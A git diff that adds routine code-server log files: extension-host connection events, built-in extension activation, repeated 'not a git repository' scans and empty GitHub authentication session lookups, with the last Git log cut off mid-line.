a/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteagent.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteagent.log new file mode 100755 index 0000000..1a8b5ed --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteagent.log @@ -0,0 +1,82 @@ +2026-01-25 23:35:05.545 [info] + + + + +2026-01-25 23:35:05.559 [info] Extension host agent started. +2026-01-25 23:35:05.595 [info] Started initializing default profile extensions in extensions installation folder. file:///root/.local/share/code-server/extensions +2026-01-25 23:35:05.605 [error] [192.168.100.179][bdcc26c3][ManagementConnection] Unknown reconnection token (never seen). +2026-01-25 23:35:05.616 [info] Completed initializing default profile extensions in extensions installation folder. file:///root/.local/share/code-server/extensions +2026-01-25 23:35:05.684 [error] [192.168.100.179][739f299b][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-25 23:35:17.916 [info] [192.168.100.179][0a91f1c6][ManagementConnection] New connection established. +2026-01-25 23:35:18.603 [info] [192.168.100.179][0dc17bb4][ExtensionHostConnection] New connection established. +2026-01-25 23:35:18.710 [info] [192.168.100.179][0dc17bb4][ExtensionHostConnection] <529> Launched Extension Host Process. +2026-01-25 23:35:18.989 [info] [192.168.100.179][0dc17bb4][ExtensionHostConnection] <529> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-25 23:36:17.239 [info] [192.168.100.179][0a91f1c6][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-25 23:36:17.332 [info] [192.168.100.179][0dc17bb4][ExtensionHostConnection] <529> Extension Host Process exited with code: 0, signal: null. +2026-01-25 23:36:18.123 [info] [192.168.100.179][eca0f46b][ManagementConnection] New connection established. +2026-01-25 23:36:18.818 [info] [192.168.100.179][d389591f][ExtensionHostConnection] New connection established. +2026-01-25 23:36:18.822 [info] [192.168.100.179][d389591f][ExtensionHostConnection] <1219> Launched Extension Host Process. +2026-01-25 23:36:19.104 [info] [192.168.100.179][d389591f][ExtensionHostConnection] <1219> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-25 23:38:38.869 [info] [192.168.100.179][eca0f46b][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-25 23:38:38.933 [info] [192.168.100.179][d389591f][ExtensionHostConnection] <1219> Extension Host Process exited with code: 0, signal: null. +2026-01-25 23:38:40.090 [info] [192.168.100.179][c785d7ca][ManagementConnection] New connection established. +2026-01-25 23:38:40.668 [info] [192.168.100.179][571fc8d1][ExtensionHostConnection] New connection established. +2026-01-25 23:38:40.672 [info] [192.168.100.179][571fc8d1][ExtensionHostConnection] <2066> Launched Extension Host Process. +2026-01-25 23:38:40.933 [info] [192.168.100.179][571fc8d1][ExtensionHostConnection] <2066> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 00:08:21.879 [info] [192.168.100.179][c785d7ca][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 00:08:21.976 [info] [192.168.100.179][571fc8d1][ExtensionHostConnection] <2066> Extension Host Process exited with code: 0, signal: null. +2026-01-26 00:10:10.488 [info] [172.18.0.2][3f327581][ManagementConnection] New connection established. +2026-01-26 00:10:12.371 [info] [172.18.0.2][7bf6560d][ExtensionHostConnection] New connection established. +2026-01-26 00:10:12.388 [info] [172.18.0.2][7bf6560d][ExtensionHostConnection] <11311> Launched Extension Host Process. +2026-01-26 00:10:12.669 [info] [172.18.0.2][7bf6560d][ExtensionHostConnection] <11311> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 00:11:04.376 [info] [172.18.0.2][3f327581][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +2026-01-26 03:10:47.701 [info] [172.18.0.2][7bf6560d][ExtensionHostConnection] <11311> Extension Host Process exited with code: 0, signal: null. +2026-01-26 03:11:14.222 [info] [172.18.0.2][3f327581][ManagementConnection] The reconnection grace time of 3h has expired, so the connection will be disposed. +2026-01-26 07:11:56.670 [info] [172.18.0.2][d87111a1][ManagementConnection] New connection established. +2026-01-26 07:11:57.608 [info] [172.18.0.2][a6a61b75][ExtensionHostConnection] New connection established. +2026-01-26 07:11:57.624 [info] [172.18.0.2][a6a61b75][ExtensionHostConnection] <43703> Launched Extension Host Process. +2026-01-26 07:11:57.880 [info] [172.18.0.2][a6a61b75][ExtensionHostConnection] <43703> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 07:12:17.288 [info] [172.18.0.2][d87111a1][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 07:12:17.342 [info] [172.18.0.2][a6a61b75][ExtensionHostConnection] <43703> Extension Host Process exited with code: 0, signal: null. +2026-01-26 07:12:18.306 [info] [172.18.0.2][dfd7ddb5][ManagementConnection] New connection established. +2026-01-26 07:12:18.959 [info] [172.18.0.2][1e9987af][ExtensionHostConnection] New connection established. +2026-01-26 07:12:18.967 [info] [172.18.0.2][1e9987af][ExtensionHostConnection] <44182> Launched Extension Host Process. +2026-01-26 07:12:19.275 [info] [172.18.0.2][1e9987af][ExtensionHostConnection] <44182> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 07:12:45.140 [info] [172.18.0.2][dfd7ddb5][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 07:12:45.206 [info] [172.18.0.2][1e9987af][ExtensionHostConnection] <44182> Extension Host Process exited with code: 0, signal: null. +2026-01-26 07:12:46.215 [info] [172.18.0.2][cb4ed6b1][ManagementConnection] New connection established. +2026-01-26 07:12:46.834 [info] [172.18.0.2][04b32aef][ExtensionHostConnection] New connection established. +2026-01-26 07:12:46.840 [info] [172.18.0.2][04b32aef][ExtensionHostConnection] <44738> Launched Extension Host Process. +2026-01-26 07:12:47.128 [info] [172.18.0.2][04b32aef][ExtensionHostConnection] <44738> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 07:13:12.558 [info] [172.18.0.2][cb4ed6b1][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 07:13:12.612 [info] [172.18.0.2][04b32aef][ExtensionHostConnection] <44738> Extension Host Process exited with code: 0, signal: null. +2026-01-26 07:13:21.430 [info] [172.18.0.2][72c41d51][ManagementConnection] New connection established. +2026-01-26 07:13:22.639 [info] [172.18.0.2][d136bb6b][ExtensionHostConnection] New connection established. +2026-01-26 07:13:22.644 [info] [172.18.0.2][d136bb6b][ExtensionHostConnection] <45273> Launched Extension Host Process. +2026-01-26 07:13:22.896 [info] [172.18.0.2][d136bb6b][ExtensionHostConnection] <45273> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 07:13:28.803 [info] [172.18.0.2][72c41d51][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 07:13:28.901 [info] [172.18.0.2][d136bb6b][ExtensionHostConnection] <45273> Extension Host Process exited with code: 0, signal: null. +2026-01-26 07:13:30.074 [info] [172.18.0.2][3266a2bb][ManagementConnection] New connection established. +2026-01-26 07:13:30.719 [info] [172.18.0.2][8e415823][ExtensionHostConnection] New connection established. +2026-01-26 07:13:30.723 [info] [172.18.0.2][8e415823][ExtensionHostConnection] <45724> Launched Extension Host Process. +2026-01-26 07:13:30.995 [info] [172.18.0.2][8e415823][ExtensionHostConnection] <45724> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 07:13:38.916 [info] [172.18.0.2][3266a2bb][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 07:13:38.995 [info] [172.18.0.2][8e415823][ExtensionHostConnection] <45724> Extension Host Process exited with code: 0, signal: null. +2026-01-26 07:13:39.967 [info] [172.18.0.2][f90052c8][ManagementConnection] New connection established. +2026-01-26 07:13:40.563 [info] [172.18.0.2][8c1eb48d][ExtensionHostConnection] New connection established. +2026-01-26 07:13:40.571 [info] [172.18.0.2][8c1eb48d][ExtensionHostConnection] <46172> Launched Extension Host Process. +2026-01-26 07:13:40.865 [info] [172.18.0.2][8c1eb48d][ExtensionHostConnection] <46172> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 10:30:48.425 [error] ptyHost terminated unexpectedly with code null +2026-01-26 10:30:48.442 [error] [File Watcher (universal)] restarting watcher after unexpected error: terminated by itself with code null, signal: SIGTERM (ETERM) +2026-01-26 10:30:48.443 [info] [172.18.0.2][8c1eb48d][ExtensionHostConnection] <46172> Extension Host Process exited with code: null, signal: SIGTERM. diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteexthost.log new file mode 100755 index 0000000..d8982ff --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteexthost.log @@ -0,0 +1,11 @@ +2026-01-26 16:44:57.207 [info] Extension host with pid 530 started +2026-01-26 16:44:57.215 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-26 16:44:57.305 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 16:44:57.306 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 16:44:57.501 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 16:44:57.549 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 16:44:57.549 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 16:44:57.700 [info] Eager extensions activated +2026-01-26 16:44:57.701 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 16:44:57.701 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 16:44:57.845 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..5427056 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.git/Git.log @@ -0,0 +1,74 @@ +2026-01-26 16:44:57.746 [info] [main] Log level: Info +2026-01-26 16:44:57.746 [info] [main] Validating found git in: "git" +2026-01-26 16:44:57.746 [info] [main] Using git "2.39.5" from "git" +2026-01-26 16:44:57.746 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 16:44:57.746 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.746 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.746 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.746 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.746 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.746 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.752 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 16:44:57.752 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.758 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.758 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.763 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.763 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.792 [info] > git rev-parse --show-toplevel [26ms] +2026-01-26 16:44:57.792 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.806 [info] > git rev-parse --show-toplevel [10ms] +2026-01-26 16:44:57.806 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.813 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 16:44:57.813 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.819 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.819 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.823 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 16:44:57.823 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.828 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.828 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.832 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.832 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.837 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:57.837 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:57.840 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 16:44:57.959 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 16:44:57.959 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:44:59.311 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:44:59.311 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:45:38.497 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 16:45:38.497 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:47:44.057 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 16:47:44.057 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 16:50:16.193 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 16:50:16.193 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 17:02:29.080 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 17:02:29.080 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 17:26:02.725 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 17:26:02.725 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 17:32:40.027 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 17:32:40.027 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 17:33:57.345 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 17:33:57.345 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..fa256d9 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 16:44:57.618 [info] Reading sessions from keychain... +2026-01-26 16:44:57.618 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.618 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.619 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.619 [info] Got 0 sessions for ... +2026-01-26 16:44:57.628 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.629 [info] Got 0 sessions for ... +2026-01-26 16:44:57.653 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.654 [info] Got 0 sessions for ... +2026-01-26 16:44:57.654 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.654 [info] Got 0 sessions for ... +2026-01-26 16:44:57.654 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.654 [info] Got 0 sessions for ... +2026-01-26 16:44:57.654 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.654 [info] Got 0 sessions for ... +2026-01-26 16:44:57.654 [info] Getting sessions for all scopes... +2026-01-26 16:44:57.654 [info] Got 0 sessions for ... +2026-01-26 16:44:59.306 [info] Getting sessions for all scopes... +2026-01-26 16:44:59.306 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..121c33b --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 16:44:57.752 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/ptyhost.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/ptyhost.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteagent.log b/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteagent.log new file mode 100755 index 0000000..8308866 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteagent.log @@ -0,0 +1,11 @@ +2026-01-26 16:44:51.705 [info] + + + + +2026-01-26 16:44:51.719 [info] Extension host agent started. +2026-01-26 16:44:55.757 [info] [192.168.100.179][56241436][ManagementConnection] New connection established. +2026-01-26 16:44:56.576 [info] [192.168.100.179][bf2ed5dd][ExtensionHostConnection] New connection established. +2026-01-26 16:44:56.618 [info] [192.168.100.179][bf2ed5dd][ExtensionHostConnection] <530> Launched Extension Host Process. +2026-01-26 16:44:56.867 [info] [192.168.100.179][bf2ed5dd][ExtensionHostConnection] <530> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteexthost.log new file mode 100755 index 0000000..bd1f90f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteexthost.log @@ -0,0 +1,18 @@ +2026-01-26 19:32:04.910 [info] Extension host with pid 483 started +2026-01-26 19:32:04.910 [error] Error: EEXIST: file already exists, open '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock' +2026-01-26 19:32:04.910 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-26 19:32:04.911 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': The pid 530 appears to be gone. +2026-01-26 19:32:04.911 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Deleting a stale lock. +2026-01-26 19:32:04.917 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-26 19:32:05.053 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 19:32:05.054 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 19:32:05.181 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 19:32:05.214 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 19:32:05.214 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 19:32:05.365 [info] Eager extensions activated +2026-01-26 19:32:05.365 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 19:32:05.365 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 19:32:05.980 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-26 20:20:31.030 [info] Extension host terminating: received terminate message from renderer +2026-01-26 20:20:31.032 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 20:20:31.060 [info] Extension host with pid 483 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..357b3b2 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.git/Git.log @@ -0,0 +1,125 @@ +2026-01-26 19:32:05.400 [info] [main] Log level: Info +2026-01-26 19:32:05.400 [info] [main] Validating found git in: "git" +2026-01-26 19:32:05.400 [info] [main] Using git "2.39.5" from "git" +2026-01-26 19:32:05.400 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 19:32:05.400 [info] > git rev-parse --show-toplevel [52ms] +2026-01-26 19:32:05.400 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.400 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.400 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.402 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.402 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.406 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.406 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.419 [info] > git rev-parse --show-toplevel [11ms] +2026-01-26 19:32:05.419 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.423 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.424 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.428 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.428 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.432 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.432 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.436 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.436 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.440 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.440 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.444 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.444 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.448 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.448 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.452 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.452 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.456 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.456 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.459 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 19:32:05.463 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.463 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.466 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:32:05.466 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:05.794 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:05.794 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:06.096 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:06.096 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:32:06.895 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:32:06.895 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:36:28.490 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 19:36:28.490 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:36:29.764 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:36:29.764 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary 